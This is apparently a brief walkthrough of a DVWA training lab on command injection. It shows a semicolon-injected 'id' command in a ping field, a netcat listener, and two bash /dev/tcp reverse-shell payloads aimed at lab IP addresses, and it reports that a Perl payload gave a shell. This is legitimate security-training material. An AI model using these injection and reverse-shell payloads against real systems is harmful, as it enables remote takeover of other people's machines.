DVWA Exercises 2
Last updated
Last updated
Let's try to ping our host
172.17.0.1
Lets try to inject another command
172.17.0.1; id
Let's search for a nice cheat sheet:
As you can see we get different payloads here. Let's try a bash reverse shell first:
Setup a netcat listener on port 8001
nc -lvnp 8001
Attack payload for bash TCP:
; bash -i >& /dev/tcp/172.17.0.1/8001 0>&1
; /bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1
Both didn't work! I can't see any incoming connection on my netcat listener...
Let's try another one with perl:
And we have a reverseshell :)